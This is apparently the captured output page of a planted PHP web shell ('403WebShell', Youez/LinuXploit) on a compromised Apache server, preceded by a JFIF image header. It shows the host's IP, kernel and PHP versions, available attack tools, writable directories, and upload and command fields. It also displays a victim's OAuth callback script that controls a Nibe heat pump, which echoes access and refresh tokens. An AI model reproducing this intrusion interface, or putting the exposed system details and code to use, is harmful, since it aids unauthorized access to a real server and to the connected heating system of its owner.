????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.135.182.75
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/energicontrol/nibe/oauth2callback/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/appsrv.astacus.se/energicontrol/nibe/oauth2callback/index_w.php
<?php
session_start();
// oauth2callback/index.php

require('../config_w.php');


if(strlen($_SESSION["access_token_w"]) < 50) {
    // try to get an access token
    $code = $_GET['code'];
    $url =  'https://api.nibeuplink.com/oauth/token';
    // this will be our POST data to send back to the OAuth server in exchange
	// for an access token

    
    
    $curl = curl_init($url);

    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

    curl_setopt($curl, CURLOPT_POST, true);

    $fields = array(
      'client_id' => $oauth2_client_id,
      'client_secret' => $oauth2_secret,
      'grant_type' => 'authorization_code',
      'redirect_uri' => $oauth2_redirect,
      "code" => $code,
      "scope" => $query_scope
    );
    
    curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($fields));

    $response = curl_exec($curl);

    $responseObj = json_decode($response);

    $access_token = $responseObj->access_token;
    $refresh_token = $responseObj->refresh_token;

    echo "<br>Access token: " . $access_token;
    echo "<br><br>Refresh token: " . $refresh_token;
    
    $_SESSION["access_token_w"] = $access_token;
    $_SESSION["refresh_token_w"] = $refresh_token;
    
}else{
    
    $access_token =  $_SESSION["access_token_w"];
}
    //##### SET VALUE 47418
    
       // ####### UNITS
     echo("<br><br>Now lets write some registers!<br>");
    
// HOT WATER BOST: 48132
    $data="{\n  \"settings\": {\n    47418: 69\n  }\n}";
   // $data = '{ "key": "47418","value": "69" }';
    $data="{\n  \"settings\": {\n    '47011': 0\n  }\n}";
    $SystemId = "144715";
  
    $SystemURL = "https://api.nibeuplink.com/api/v1/systems/".$SystemId."/parameters/";

    
    echo("<br>SystemURL: ".$SystemURL."<br>");
    $curl = curl_init($SystemURL);
    curl_setopt($curl, CURLOPT_HTTPHEADER, array( 'Authorization: Bearer '.$access_token,
        'Content-Type: application/json'));
    curl_setopt($curl, CURLOPT_CUSTOMREQUEST, "PUT");
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,TRUE);
    curl_setopt($curl, CURLOPT_POSTFIELDS,$data);
 
    $response = curl_exec($curl);
    $responseObj = json_decode($response,true);
     
   echo "<pre>";
   print_r($responseObj);
     echo "</pre>";
    
    
    
    



?>

Youez - 2016 - github.com/yon3zu
LinuXploit